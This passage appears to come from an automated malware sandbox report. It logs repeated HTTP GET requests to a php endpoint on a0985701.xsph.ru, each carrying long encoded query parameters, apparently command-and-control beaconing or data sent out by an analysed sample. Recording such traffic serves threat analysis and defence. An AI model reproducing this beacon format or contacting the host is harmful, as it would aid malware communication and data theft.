pUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0